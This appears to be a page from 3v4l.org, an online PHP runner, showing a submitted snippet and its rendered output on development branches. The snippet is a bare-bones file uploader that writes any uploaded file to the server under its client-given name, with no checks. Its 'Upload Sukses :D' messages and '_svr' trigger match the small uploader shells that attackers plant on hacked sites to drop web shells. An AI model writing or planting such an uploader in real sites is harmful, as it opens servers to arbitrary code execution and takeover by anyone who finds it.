3v4l.org

run code in 300+ PHP versions simultaneously
<form action="" method="post" enctype="multipart/form-data"> <input type="file" name="file" size="50"> <input type="submit" name="_svr" value="upload"> </form> <?php if(ISSET($_REQUEST['_svr'])){ $_svr=($_REQUEST['_svr']); if($_svr==('upload')){ if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Sukses :D</b><br><br>'; } else { echo '<b>Upload Gagal :D</b><br><br>'; die(); }} } ?>
Output for git.master, git.master_jit, rfc.property-hooks
<form action="" method="post" enctype="multipart/form-data"> <input type="file" name="file" size="50"> <input type="submit" name="_svr" value="upload"> </form>

This tab shows result from various feature-branches currently under review by the php developers. Contact me to have additional branches featured.

Active branches

Archived branches

Once feature-branches are merged or declined, they are no longer available. Their functionality (when merged) can be viewed from the main output page


preferences:
39.34 ms | 401 KiB | 8 Q